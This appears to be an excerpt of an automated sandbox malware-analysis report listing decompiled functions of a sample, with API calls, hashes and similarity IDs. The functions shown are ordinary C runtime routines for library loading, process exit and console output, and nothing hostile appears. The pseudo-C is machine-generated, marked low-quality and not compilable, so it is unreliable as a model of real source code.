                                                                                                                          Function 0025005C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 25%
                                                                                                                          			E0025005C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x264050; // 0x6b8b9fba
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x25af76, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x267000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                                                                                          0x00250071
                                                                                                                          0x0025007c
                                                                                                                          0x00250082
                                                                                                                          0x00250086
                                                                                                                          0x00250091
                                                                                                                          0x00250099
                                                                                                                          0x002500a3
                                                                                                                          0x002500a9
                                                                                                                          0x002500ad
                                                                                                                          0x002500b4
                                                                                                                          0x002500ba
                                                                                                                          0x002500ba
                                                                                                                          0x002500ad
                                                                                                                          0x002500c0
                                                                                                                          0x002500c5
                                                                                                                          0x002500c5
                                                                                                                          0x002500ce
                                                                                                                          0x002500d8

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6B8B9FBA,?,?,00000000,0025AF76,000000FF,?,00250126,0024FFC1,?,002501C2,00000000), ref: 00250091
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002500A3
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0025AF76,000000FF,?,00250126,0024FFC1,?,002501C2,00000000), ref: 002500C5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: d71a06f8f7f7af9b450b1035889f017779ee5643b6f28663ec979447f3e28b89
                                                                                                                          • Instruction ID: db54d87c427e64cf6323886f6b6004d5fd35368d300d239980035a3aa047ff8e
                                                                                                                          • Opcode Fuzzy Hash: d71a06f8f7f7af9b450b1035889f017779ee5643b6f28663ec979447f3e28b89
                                                                                                                          • Instruction Fuzzy Hash: 7F01D631924615EFCB119F50EC49FAFBBB8FB05B16F044629FC11A22E0EBB49D14CA94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024A490 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnableItemMenu$AvailableClipboardFormat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4217543366-0
                                                                                                                          • Opcode ID: b24e4adbb8a0b79ab8bda35df6b1dab484c7a2d48b6a19325389c201a0ae40d3
                                                                                                                          • Instruction ID: 869a4426e68a493313dc1ead7b316119c5be50a4a2ed731370f95a878ac8d02e
                                                                                                                          • Opcode Fuzzy Hash: b24e4adbb8a0b79ab8bda35df6b1dab484c7a2d48b6a19325389c201a0ae40d3
                                                                                                                          • Instruction Fuzzy Hash: C6119874604204AFD744EF68E59979EBBE0EB84701F00C42DEC898B394DBB5E8549B56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002431F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostTimer
                                                                                                                          • String ID: 2$2
                                                                                                                          • API String ID: 2370412193-3784399050
                                                                                                                          • Opcode ID: a6cef7de69ba1927510a0bafc3709e1ea8fddca4141f8a194fb355b5096c2fa9
                                                                                                                          • Instruction ID: 9e3a65c7e94f64b475d7dd7a810c6fcf2359612d3fa427667e83ae0c756d7257
                                                                                                                          • Opcode Fuzzy Hash: a6cef7de69ba1927510a0bafc3709e1ea8fddca4141f8a194fb355b5096c2fa9
                                                                                                                          • Instruction Fuzzy Hash: 93119374214205EFE704EF58D148BA97BE0BB44354F45C4A9EC8D8B2A1D7B5EA98CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002560C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002560C6(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00254A99(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                                                          0x002560d3
                                                                                                                          0x002560db
                                                                                                                          0x00256110
                                                                                                                          0x002560dd
                                                                                                                          0x002560e6
                                                                                                                          0x00000000
                                                                                                                          0x0025610d
                                                                                                                          0x0025610c
                                                                                                                          0x0025610c

                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00256162,?,?,00000000,?,?,?,00255FAA,00000000,FlsAlloc,0025D668,0025D670), ref: 002560D3
                                                                                                                          • GetLastError.KERNEL32(?,00256162,?,?,00000000,?,?,?,00255FAA,00000000,FlsAlloc,0025D668,0025D670,?,=:%,00251C6A), ref: 002560DD
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,=:%,00251C6A,00251D4E,00000003,002514CB,?,?,?,?,00000000,00000000,00000000), ref: 00256105
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                          • Opcode ID: 1d56d6dcaf3ecddb30d5ffaf98480811b3f34557cdc3d65dac7d6533f8928224
                                                                                                                          • Instruction ID: f6e4af252758ea1e324adb0b8184312ab66ad7fd13c7b306b2b3d30c09ea8433
                                                                                                                          • Opcode Fuzzy Hash: 1d56d6dcaf3ecddb30d5ffaf98480811b3f34557cdc3d65dac7d6533f8928224
                                                                                                                          • Instruction Fuzzy Hash: 31E01270690205B7DF101F61FC0EB683B54AB00B95F54C020FD0DA91E1DBB1A9749688
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00256A01 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00256A01(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x25afcd);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x264050; // 0x6b8b9fba
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x2662e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E002514D0(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x2662e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x2662e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x2662e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00258785(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00258785(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x2647b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x2662e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E002589C0( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x2647b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x2662e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E0024F6F0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x2662e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E002589C0( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00255A69(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E0024DB65(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                                                                                                                          0x00256a06
                                                                                                                          0x00256a08
                                                                                                                          0x00256a13
                                                                                                                          0x00256a14
                                                                                                                          0x00256a17
                                                                                                                          0x00256a1c
                                                                                                                          0x00256a1e
                                                                                                                          0x00256a24
                                                                                                                          0x00256a28
                                                                                                                          0x00256a2e
                                                                                                                          0x00256a33
                                                                                                                          0x00256a39
                                                                                                                          0x00256a3c
                                                                                                                          0x00256a3f
                                                                                                                          0x00256a42
                                                                                                                          0x00256a45
                                                                                                                          0x00256a48
                                                                                                                          0x00256a52
                                                                                                                          0x00256a59
                                                                                                                          0x00256a61
                                                                                                                          0x00256a64
                                                                                                                          0x00256a6a
                                                                                                                          0x00256a6e
                                                                                                                          0x00256a71
                                                                                                                          0x00256a75
                                                                                                                          0x00256a75
                                                                                                                          0x00256a7d
                                                                                                                          0x00256a85
                                                                                                                          0x00256a8a
                                                                                                                          0x00256a8b
                                                                                                                          0x00256a8c
                                                                                                                          0x00256a8d
                                                                                                                          0x00256a90
                                                                                                                          0x00256a92
                                                                                                                          0x00256a98
                                                                                                                          0x00256a9e
                                                                                                                          0x00256aa1
                                                                                                                          0x00256aa3
                                                                                                                          0x00256aa6
                                                                                                                          0x00256aaf
                                                                                                                          0x00256ab5
                                                                                                                          0x00256ab8
                                                                                                                          0x00256abf
                                                                                                                          0x00256ac6
                                                                                                                          0x00256ac9
                                                                                                                          0x00256c03
                                                                                                                          0x00256c07
                                                                                                                          0x00256c0a
                                                                                                                          0x00256c2d
                                                                                                                          0x00256c33
                                                                                                                          0x00256c35
                                                                                                                          0x00256c39
                                                                                                                          0x00256c6a
                                                                                                                          0x00256c6d
                                                                                                                          0x00256c6f
                                                                                                                          0x00000000
                                                                                                                          0x00256c3b
                                                                                                                          0x00256c3b
                                                                                                                          0x00256c3e
                                                                                                                          0x00256c41
                                                                                                                          0x00256c44
                                                                                                                          0x00256d8e
                                                                                                                          0x00256d9c
                                                                                                                          0x00256da5
                                                                                                                          0x00256c4a
                                                                                                                          0x00256c54
                                                                                                                          0x00256c59
                                                                                                                          0x00256c5c
                                                                                                                          0x00256c5f
                                                                                                                          0x00256c65
                                                                                                                          0x00000000
                                                                                                                          0x00256c65
                                                                                                                          0x00256c5f
                                                                                                                          0x00256c44
                                                                                                                          0x00256c0c
                                                                                                                          0x00256c13
                                                                                                                          0x00256c16
                                                                                                                          0x00256c19
                                                                                                                          0x00256c1b
                                                                                                                          0x00256c1e
                                                                                                                          0x00256c25
                                                                                                                          0x00256c27
                                                                                                                          0x00256c70
                                                                                                                          0x00256c73
                                                                                                                          0x00256c74
                                                                                                                          0x00256c79
                                                                                                                          0x00256c7c
                                                                                                                          0x00256c7f
                                                                                                                          0x00256c85
                                                                                                                          0x00000000
                                                                                                                          0x00256c85
                                                                                                                          0x00256c7f
                                                                                                                          0x00256acf
                                                                                                                          0x00256ad2
                                                                                                                          0x00256ad4
                                                                                                                          0x00256ad6
                                                                                                                          0x00256ada
                                                                                                                          0x00256adb
                                                                                                                          0x00256adf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00256adf
                                                                                                                          0x00256ae4
                                                                                                                          0x00256ae6
                                                                                                                          0x00256aeb
                                                                                                                          0x00256bab
                                                                                                                          0x00256bb2
                                                                                                                          0x00256bb3
                                                                                                                          0x00256bb6
                                                                                                                          0x00256bb8
                                                                                                                          0x00256d68
                                                                                                                          0x00256d6a
                                                                                                                          0x00000000
                                                                                                                          0x00256d6c
                                                                                                                          0x00256d6c
                                                                                                                          0x00256d6f
                                                                                                                          0x00256d7e
                                                                                                                          0x00256d82
                                                                                                                          0x00256d83
                                                                                                                          0x00256d83
                                                                                                                          0x00000000
                                                                                                                          0x00256d87
                                                                                                                          0x00000000
                                                                                                                          0x00256bbe
                                                                                                                          0x00256bc3
                                                                                                                          0x00256bc6
                                                                                                                          0x00256bc9
                                                                                                                          0x00256bcf
                                                                                                                          0x00256bd8
                                                                                                                          0x00256be3
                                                                                                                          0x00256be8
                                                                                                                          0x00256beb
                                                                                                                          0x00256bee
                                                                                                                          0x00256bf7
                                                                                                                          0x00256bf7
                                                                                                                          0x00256bfa
                                                                                                                          0x00000000
                                                                                                                          0x00256bfa
                                                                                                                          0x00256bee
                                                                                                                          0x00256af1
                                                                                                                          0x00256af4
                                                                                                                          0x00256afa
                                                                                                                          0x00256afc
                                                                                                                          0x00256b09
                                                                                                                          0x00256b0a
                                                                                                                          0x00256b0d
                                                                                                                          0x00256b10
                                                                                                                          0x00256b15
                                                                                                                          0x00256d39
                                                                                                                          0x00256d3b
                                                                                                                          0x00256d3d
                                                                                                                          0x00256d40
                                                                                                                          0x00256d43
                                                                                                                          0x00256d4f
                                                                                                                          0x00256d52
                                                                                                                          0x00256d54
                                                                                                                          0x00256d55
                                                                                                                          0x00256d59
                                                                                                                          0x00256d5c
                                                                                                                          0x00256d5c
                                                                                                                          0x00256d60
                                                                                                                          0x00256d60
                                                                                                                          0x00256d60
                                                                                                                          0x00256d63
                                                                                                                          0x00256d63
                                                                                                                          0x00256b1b
                                                                                                                          0x00256b1b
                                                                                                                          0x00256b1e
                                                                                                                          0x00256b20
                                                                                                                          0x00256b23
                                                                                                                          0x00256b25
                                                                                                                          0x00256b29
                                                                                                                          0x00256b2a
                                                                                                                          0x00256b2b
                                                                                                                          0x00256b2f
                                                                                                                          0x00256b34
                                                                                                                          0x00256b3e
                                                                                                                          0x00256b43
                                                                                                                          0x00256b46
                                                                                                                          0x00256b46
                                                                                                                          0x00256b49
                                                                                                                          0x00256b4c
                                                                                                                          0x00256b4e
                                                                                                                          0x00256b51
                                                                                                                          0x00256b5a
                                                                                                                          0x00256b5e
                                                                                                                          0x00256b5f
                                                                                                                          0x00256b66
                                                                                                                          0x00256b6c
                                                                                                                          0x00256b74
                                                                                                                          0x00256b7f
                                                                                                                          0x00256b84
                                                                                                                          0x00256b8f
                                                                                                                          0x00256b94
                                                                                                                          0x00256b9a
                                                                                                                          0x00256ba3
                                                                                                                          0x00256bfd
                                                                                                                          0x00256bfd
                                                                                                                          0x00256c88
                                                                                                                          0x00256c8d
                                                                                                                          0x00256c9f
                                                                                                                          0x00256ca4
                                                                                                                          0x00256ca7
                                                                                                                          0x00256cac
                                                                                                                          0x00256cc7
                                                                                                                          0x00256daa
                                                                                                                          0x00256db0
                                                                                                                          0x00256ccd
                                                                                                                          0x00256ccd
                                                                                                                          0x00256cd8
                                                                                                                          0x00256cda
                                                                                                                          0x00256cdd
                                                                                                                          0x00256ce6
                                                                                                                          0x00256cf0
                                                                                                                          0x00000000
                                                                                                                          0x00256cf2
                                                                                                                          0x00256cf4
                                                                                                                          0x00256cf6
                                                                                                                          0x00256d0f
                                                                                                                          0x00000000
                                                                                                                          0x00256d15
                                                                                                                          0x00256d19
                                                                                                                          0x00256d1f
                                                                                                                          0x00256d22
                                                                                                                          0x00256d28
                                                                                                                          0x00256d2b
                                                                                                                          0x00000000
                                                                                                                          0x00256d2b
                                                                                                                          0x00256d19
                                                                                                                          0x00256d0f
                                                                                                                          0x00256cf0
                                                                                                                          0x00256ce6
                                                                                                                          0x00256cc7
                                                                                                                          0x00256cac
                                                                                                                          0x00256b9a
                                                                                                                          0x00256b15
                                                                                                                          0x00256aeb
                                                                                                                          0x00000000
                                                                                                                          0x00256d2e
                                                                                                                          0x00256d2e
                                                                                                                          0x00256d37
                                                                                                                          0x00256db2
                                                                                                                          0x00256db7
                                                                                                                          0x00256dbf
                                                                                                                          0x00256dc0
                                                                                                                          0x00256dc1
                                                                                                                          0x00256dcd
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetConsoleOutputCP.KERNEL32(6B8B9FBA,?,00000000,?), ref: 00256A64
                                                                                                                            • Part of subcall function 00255A69: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,002564DD,?,00000000,-00000008), ref: 00255B15
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00256CBF
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00256D07
                                                                                                                          • GetLastError.KERNEL32 ref: 00256DAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2112829910-0
                                                                                                                          • Opcode ID: 3d1b977888abadbef447e97b45a40cb409f2af98fd87486762342b24c325e88f
                                                                                                                          • Instruction ID: 1c722e7ef507a8014fa5d28306a796ecbb6ade4b2322e7a869d0f26ce43dcbaa
                                                                                                                          • Opcode Fuzzy Hash: 3d1b977888abadbef447e97b45a40cb409f2af98fd87486762342b24c325e88f
                                                                                                                          • Instruction Fuzzy Hash: 4FD17775E102499FCF15CFA8D888AEDBBB4FF08305F18852AE855EB351D630A866CF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002578EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
